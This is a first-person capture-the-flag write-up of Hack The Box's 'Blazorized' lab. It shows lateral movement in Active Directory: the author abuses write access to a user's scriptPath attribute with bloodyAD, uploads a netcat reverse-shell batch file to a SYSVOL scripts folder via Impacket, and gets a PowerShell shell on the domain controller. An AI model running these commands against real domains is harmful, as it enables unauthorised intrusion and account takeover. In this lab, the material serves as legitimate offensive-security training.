Logon Script
┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ KRB5CCNAME=rsa_4810@dc1.blazorized.htb.ccache bloodyAD -d BLAZORIZED.HTB -k --host dc1.blazorized.htb get writable --detail
distinguishedName: CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
scriptPath: WRITE
[...REDACTED...]It has been identified that the rsa_4810 account has WRITE access to the scriptPath attribute of the ssa_6010 account. I will be modifying the logon script of the ssa_6010 user for code execution
┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ KRB5CCNAME=rsa_4810@dc1.blazorized.htb.ccache bloodyAD -d BLAZORIZED.HTB -k --host dc1.blazorized.htb set object ssa_6010 scriptPath -v 'C:\tmp\nc64.exe 10.10.14.110 4444 -e powershell'
[+] ssa_6010's scriptPath has been updatedIt doesn’t seem to be executing the logon script. It likely is due to the group policy as this is in the domain context
Forum says that it’s A32FF3AEAA23/logon.bat, but where does that even come from? Let’s find out
Domain Logon Script
┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ cat logon.bat
@echo off
cmd /c C:\tmp\nc64.exe 10.10.14.110 4444 -e powershellI created a batch script to execute the Netcat binary for reverse shell
┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ KRB5CCNAME=rsa_4810@dc1.blazorized.htb.ccache impacket-smbclient BLAZORIZED.HTB/@dc1.blazorized.htb -k -no-pass -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use SYSVOL
# ls
drw-rw-rw- 0 Mon Jan 8 20:30:33 2024 .
drw-rw-rw- 0 Mon Jan 8 20:30:33 2024 ..
drw-rw-rw- 0 Mon Jan 8 20:30:33 2024 blazorized.htb
# cd blazorized.htb
# ls
drw-rw-rw- 0 Mon Jan 8 20:36:56 2024 .
drw-rw-rw- 0 Mon Jan 8 20:36:56 2024 ..
drw-rw-rw- 0 Tue Jul 2 12:46:31 2024 DfsrPrivate
drw-rw-rw- 0 Sat Feb 3 01:48:25 2024 Policies
drw-rw-rw- 0 Wed May 29 21:37:21 2024 scripts
# cd scripts
# ls
drw-rw-rw- 0 Wed May 29 21:37:21 2024 .
drw-rw-rw- 0 Wed May 29 21:37:21 2024 ..
drw-rw-rw- 0 Wed May 29 21:38:28 2024 11DBDAEB100D
drw-rw-rw- 0 Wed May 29 21:33:22 2024 A2BFDCF13BB2
drw-rw-rw- 0 Wed Jul 3 00:08:53 2024 A32FF3AEAA23
drw-rw-rw- 0 Wed May 29 21:36:05 2024 CADFDDCE0BAD
drw-rw-rw- 0 Wed May 29 21:37:17 2024 CAFE30DAABCBThere are 5 directories under \\dc1.blazorized.htb\SYSVOL\blazorized.htb\scripts
# cd 11DBDAEB100D
# put logon.bat
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
# cd A2BFDCF13BB2
# put logon.bat
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
# cd CADFDDCE0BAD
# put logon.bat
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
# cd CAFE30DAABCB
# put logon.bat
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
# cd A32FF3AEAA23
# put logon.bat
# ls
drw-rw-rw- 0 Wed Jul 3 00:30:42 2024 .
drw-rw-rw- 0 Wed Jul 3 00:30:42 2024 ..
-rw-rw-rw- 0 Wed May 29 23:17:10 2024 02FCE0D1303F.bat
drw-rw-rw- 0 Wed May 29 23:17:11 2024 113EB3B0B2D3
drw-rw-rw- 0 Wed May 29 23:17:12 2024 21FDFAAFC1D0
drw-rw-rw- 0 Wed May 29 23:17:12 2024 23010E0A1A33
drw-rw-rw- 0 Wed May 29 23:17:13 2024 2BECF3DC0B3D
drw-rw-rw- 0 Wed May 29 23:17:13 2024 2F3FCC01E0A3
drw-rw-rw- 0 Wed May 29 23:17:13 2024 3DACA30B03D1
drw-rw-rw- 0 Wed May 29 23:17:14 2024 3EAF2A3E0CED
drw-rw-rw- 0 Wed May 29 23:17:14 2024 A3F211DCB11D
drw-rw-rw- 0 Wed May 29 23:17:14 2024 AADE1BA2A3E3
drw-rw-rw- 0 Wed May 29 23:17:15 2024 AC2210DC311B
drw-rw-rw- 0 Wed May 29 23:17:15 2024 B2ACCF2BABFB
drw-rw-rw- 0 Wed May 29 23:17:16 2024 BE11A3E0EA13
drw-rw-rw- 0 Wed May 29 23:17:16 2024 BFDDF0E1B33E
drw-rw-rw- 0 Wed May 29 23:17:17 2024 C20F1322FB3C
drw-rw-rw- 0 Wed May 29 23:17:17 2024 CD102CDEFD0E
drw-rw-rw- 0 Wed May 29 23:17:17 2024 CED022B22EBA
drw-rw-rw- 0 Wed May 29 23:17:18 2024 D0ECECBC1CCF
drw-rw-rw- 0 Wed May 29 23:17:18 2024 F1D30FCB0100
drw-rw-rw- 0 Wed May 29 23:17:19 2024 FD33C0CE11AC
-rw-rw-rw- 65 Wed Jul 3 00:30:42 2024 logon.batI was able to put the batch script to the A32FF3AEAA23 directory
This suggests either
- that the current user,
rsa_4810, has write access to the theA32FF3AEAA23directory - that the
A32FF3AEAA23directory belongs to the current user,rsa_4810
┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ KRB5CCNAME=rsa_4810@dc1.blazorized.htb.ccache bloodyAD -d BLAZORIZED.HTB -k --host dc1.blazorized.htb set object ssa_6010 scriptPath -v 'A32FF3AEAA23/logon.bat'
[+] ssa_6010's scriptPath has been updatedNow I will update the scriptPath attribute of the ssa_6010 account to A32FF3AEAA23/logon.bat
┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ KRB5CCNAME=rsa_4810@dc1.blazorized.htb.ccache bloodyAD -d BLAZORIZED.HTB -k --host dc1.blazorized.htb get object 'CN=SSA_6010,CN=USERS,DC=BLAZORIZED,DC=HTB' --resolve-sd | grep -v 'nTSecurityDescriptor*'
distinguishedName: CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 2024-06-19 14:58:18.857519+00:00
cn: SSA_6010
dSCorePropagationData: 2024-06-19 13:24:50+00:00; 2024-06-14 12:40:41+00:00; 2024-06-14 12:40:28+00:00; 2024-06-14 12:38:20+00:00; 1601-01-01 00:00:00+00:00
displayName: SSA_6010
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2024-07-02 22:34:10.248035+00:00
lastLogonTimestamp: 2024-06-27 12:18:21.418633+00:00
logonCount: 4271
memberOf: CN=Super_Support_Administrators,CN=Users,DC=blazorized,DC=htb; CN=Remote Management Users,CN=Builtin,DC=blazorized,DC=htb
name: SSA_6010
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=blazorized,DC=htb
objectClass: top; person; organizationalPerson; user
objectGUID: {8bf3166b-e716-4f91-946c-174e1fb433ed}
objectSid: S-1-5-21-2039403211-964143010-2924010611-1124
primaryGroupID: 513
pwdLastSet: 2024-02-25 17:56:55.592981+00:00
sAMAccountName: SSA_6010
sAMAccountType: 805306368
scriptPath: A32FF3AEAA23/logon.bat
uSNChanged: 345995
uSNCreated: 29007
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
userPrincipalName: SSA_6010@blazorized.htb
whenChanged: 2024-07-02 22:13:53+00:00
whenCreated: 2024-01-10 14:32:00+00:00Confirmed.
Another important thing to note is that the logonCount attribute has 4271, which suggests that there likely is a scheduled task that automates the login of the ssa_6010 account
┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.22] 64221
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
blazorized\ssa_6010
PS C:\Windows\system32> hostname
DC1
PS C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.22
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2Lateral Movement made to the ssa_6010 account via tampering the logon script